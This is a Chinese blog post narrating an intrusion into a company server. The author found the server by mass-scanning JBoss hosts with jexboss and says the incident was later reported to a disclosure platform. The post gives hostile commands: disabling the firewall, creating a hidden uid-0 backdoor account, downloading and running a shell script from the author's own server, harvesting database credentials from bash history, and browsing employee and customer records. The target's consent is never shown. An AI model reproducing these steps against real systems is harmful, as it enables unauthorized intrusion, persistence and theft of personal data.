2. 程式人生 > >記一次曲折的滲透測試經歷

記一次曲折的滲透測試經歷

阿新 發佈:2019-01-30

昨天把jexboss指令碼整合到我的多執行緒框架裡,掃了一遍全國jboss,發現一千多個shell.

隨意拿了一個看似大廠商的,作本次入侵測試

發現傳送門

通過jexboss拿到shell,看到是centos的機器(IP已打碼).

這裡寫圖片描述

看起來是root,確認一下.

這裡寫圖片描述

不穩定的傳送門

shell的問題

接下來執行命令的時候,發現這個jexboss自帶的shell很不穩定.出現各種問題,包括但不限於以下兩個嚴重問題:
- 執行有互動的命令時,程式會崩潰退出.比如說:cat命令會正常回顯,但是vi命令會導致shell直接報錯退出.
- 命令錯誤時,無回顯

只好自己再做個穩定的shell

nc的嘗試

看到系統有nc.我想簡單用nc彈個穩定的shell回來,發現我提交的所有nc命令都沒有回顯,且連不上shell.

Py的嘗試

放棄了nc,看看系統有沒有python,結果還是--version沒回顯,但是有-h

這裡寫圖片描述

然後我又想用py彈個shell回來,用了這段程式碼,發現也沒有成功,有點古怪.

這裡寫圖片描述

我又執行了一句簡單的print,仍然沒有回顯!

why?

這裡我思考了一下,如果它是因為報錯了才無回顯.那麼能引起報錯的應該是程式碼中( ) ' "等特殊字元在傳輸過程出現了錯誤.

我又用幾個簡單的shell程式碼具體測試了一下,證實猜測:
- 含有' "

| > >> & 等特殊字元的命令,均不能執行.且沒有回顯

這意味著?

這意味著我基本不能通過這個shell執行含有非字母字元的命令了!
不能使用nc,不能使用python,管道,重定向都不行了

SSH的嘗試

看來這個shell基本是廢的.看了下程序,埠,以及iptables防火牆,發現一些針對性的配置,說明還是部署了一些安全防禦的.看到22埠後,我果斷關了防火牆.我新建個使用者,然後外面用ssh連不就OK了麼

於是我新建了一個管理員使用者
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash php

查看了一下/etc/passwd

沒有問題,建立成功!

這裡寫圖片描述

然後在修改其密碼時
passwd php

沒有回顯!!!
我想起來,這個修改密碼的動作是要使用者互動幾次的.之前說過,執行互動的命令都是報錯退出,沒回顯..所以又完蛋了

這裡寫圖片描述

一般ssh都不會允許空密碼連線的,我試了一下,結果像這樣.
ssh: connect to host 183.xxx.xxx.xxx port 22: Connection refused

我檢視下ssh的配置檔案cat /etc/ssh/sshd_config
結果如下:

#   $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 deraadt Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 2525

#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

除了配置檔案裡禁止了空密碼登入外,管理員還把ssh的預設埠改成了2525,可以可以

於是我在配置檔案里加一句話,允許空密碼登入不就OK了麼.

然而我在寫命令時,不能用非字母字元!還不能使用編輯器互動!
vi直接崩,sed不行,echo重定向也不行...

穩定的傳送門

根據這個辣雞shell的臊性,看來我是很難往系統裡寫入東西了,於是在外部下載程式碼本地執行總可以的吧,反正有Python了.

wget xxx.xxx.xxx 這個命令沒有特殊字元!應該可以執行

寫了個指令碼掛在我的伺服器上,再從目標機wget到本地.
ls出來的時候,我就炸了!

這裡寫圖片描述

果斷python shell.py ,看到那個sh-4.1 出來的時候就知道搞定了!

這裡寫圖片描述

然後改了我建立使用者的密碼,外部ssh連線,傳送門終於穩定下來.

逛逛資料庫

拿到穩定的shell,看看資料庫

試試在命令歷史中尋找相關命令:
cat ~/.bash_history |grep sql

結果如下,果然有貨

這裡寫圖片描述

不費吹灰之力進了資料庫:

這裡寫圖片描述

mysql裡面的命令列對我來說早就輕車熟路

這裡寫圖片描述

use information_schema

select table_name,table_rows from tables where TABLE_SCHEMA = 'cloudcompany' order by table_rows desc;

這裡寫圖片描述

管理員表:

這裡寫圖片描述

都是員工資料(216條資料),來看一條:

這裡寫圖片描述

挑一些有用的看看:

這裡寫圖片描述

另外一個表(30W資料):

這裡寫圖片描述

結語

看來資料庫沒太多東西.邊做邊寫文章效率太低,已經工作快四個小時了,內網什麼的不做了,交漏洞走人!

注:本文已遮蔽所有敏感資料,僅供技術交流,該入侵事件已提交烏雲漏洞平臺.

轉載請註明出處,並告知本人
mail: [email protected]

相關推薦

曲折滲透測試經歷

昨天把jexboss指令碼整合到我的多執行緒框架裡,掃了一遍全國jboss,發現一千多個shell. 隨意拿了一個看似大廠商的,作本次入侵測試 發現傳送門 通過jexboss拿到shell,看到是centos的機器(IP已打碼). 看起來是r

克隆管理員的經歷

註冊表 克隆管理員半夜Server 2008R2安裝MS17-010補丁時,重啟系統 發現系統密碼忘記了還好本地登錄的安全策略留了一個guest用戶本地搭建了DVWA WEB滲透測試環境 權限為system通過漏洞上傳過狗一句話木馬木馬權限為system權限可以創建用戶 但是無法將用戶添加至管理員組

Python爬蟲開發經歷

light 情況 獲取 數據類型 true charm req 是我 遇到 為啥要做Python爬蟲,是因為我去找電影的某個網站有點坑,它支持tag標簽查詢自己喜歡的電影,但是不支持雙標簽或者三標簽查詢。由於一個電影對應多種類型(tag),這就意味著,我需要進入這個電影介紹

B站答題經歷

style sans spa ima .com 選擇題 科技 nbsp 結構 第一題部分:社區規範卷 --------- ------------ 第二題:社區規範第二部分 -------------------- 第三部分自由選擇題

失敗的面試經歷

pub collect int 抽象 final 順序 多重 arr boolean 1. 前言  前幾天,濟南的一家公司來我們學校進行校招。工作室的創始人在那家公司混的還不錯,本來人家公司並沒有把我們學校作為被招聘的學校,是我們工作室的創始人極力推薦才來我們學校

伺服器Tomcat優化經歷

公司需要一臺測試伺服器來做測試用,所以花了點時間把服務全部部署好,在部署好war包之後,發現Tomcat訪問超級慢。 1、進入Tomcat的bin目錄下,執行 ./catalina.sh run命令,在前臺列印執行資訊,首先看其有沒有報錯。好,沒有報錯,進行下一步。 1)修改你的jdk目錄下/

生成pdf的經歷

繼上次踩完h5的坑後,迎來了新需求,需要生成pdf,內容包括封面,目錄,然後就是正文,正文的內容包括,頁首,頁尾,圖表,表格,圖片,地圖 最後實現的效果 封面 目錄 主體內容 使用的框架 jspdf (放棄) 在網上搜到有關於jspdf的問題

msfconsole_android滲透實驗

1>檢視本機IP 2>生成App木馬 3>將生成的木馬安裝至手機 4>開啟msfconsole  1,  user exploit/multi/handler  載入模組、  2, set payload android/meterpreter/reverse_tcp  選擇

伺服器被黑經歷

從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer 也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更改

伺服器被攻擊經歷

    從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer     也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更

掛馬清除經歷:處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬

昨天發現 一臺伺服器突然慢了 top 顯示 幾個程序100%以上的cpu使用 執行命令為 : /tmp/php  -s /tmp/p2.conf 基本可以確定是被掛馬了 下一步確定來源  last 沒有登陸記錄 先幹掉這幾個程序,但是幾分鐘之後又出

fis3+react開發經歷

前言: 雖然說是記錄fis3+react的一次開發經歷。但是在專案的上線前幾天收到公司TC委員會的郵件,因為react的開源協議讓找到react的替代方案,並且逐步下線線上的react專案。真的是可以用“出師未捷身先死”來形容這次開發了。 不過經過調研以後發

百度面試經歷:

一、一面技術面:1、solr全文索引;2、寫一個二分查詢;3、HashMap資料結構(JDK1.8為紅黑樹->並未看1.8的原始碼)問的很細,最後會問桶下面只能有連結串列實現嗎?就是想問1.8的實現;4、MySQL優化和索引;5、spring的DI,IOC、AOP;6、

開發平臺測試環境的安裝

如果 ria members 平臺 sam 社區 bind posit cat 1、查詢看系統版本 cat /etc/redhat-release 2、安裝openjdK yum -y install java-1.8.0-openjdk java-1.8.0-ope

網站被黑經歷

blog http RoCE .proto lang 解決方法 protocol parent cti 問題原由 早上突然接到客戶電話,網站在微信中無法打開,被微信攔截 在pc端訪問網站,點擊首頁中任何一個url都會跳轉到第三方網站,恍然大悟,網站是被黑了 問題分析 發現網

阿里巴巴一面經歷,作為名java程式設計師終於找到了自己差距!

面試前的故事 上週在拉勾上收到一個螞蟻金服的大哥要我的簡歷,當時很驚訝,居然有螞蟻金服的找到我,然後想都沒想就給了。 受

網路爬蟲之js逆向解密經歷

1 引言 數月前寫過某網站(請原諒我的掩耳盜鈴)的爬蟲,這兩天需要重新採集一次,用的是scrapy-redis框架,本以為二次爬取可以輕鬆完成的,可沒想到爬蟲啟動沒幾秒,出現了大堆的重試提示,心裡頓時就咯噔一下,悠閒時光估計要結束了。 仔細分析後,發現是獲取店鋪列表的請求出現問題,通過瀏覽器抓包,發現請求

對`vulnhub`中`Android4`靶機滲透測試全過程

記一次對vulnhub中Android4靶機滲透測試全過程 Android4靶機簡介 名稱:Android4 作業系統:Android v4.4 標誌:/data/root/(在此目錄中) 等級:初學者。 搭建成功的Android平臺 知識點 埠掃描和IP發現 使用adb_server_exe

阿裏電面經歷

art 存儲空間 自由 結束 eas 大型 特定 easy col 昨天下午(3/19)三點多鐘,接到了一個杭州的電話,是阿裏的。問我是否方便聊聊。我說我在上課,四點下課。然後他就四點多鐘的時候又打了一次過來。項目經歷上來就問我有無大型項目的經歷。不好意思,我說無。。。又

服務器Tomcat優化經歷

type tomcat優化 ext stream jpg 試用 ros index ctp 博主原創,轉載請註明。 公司需要一臺測試服務器來做測試用,所以花了幾天時間把服務全部部署好,在部署好war包之後,發現Tomcat訪問超級慢。 1、進入Tomcat的bin目錄下,運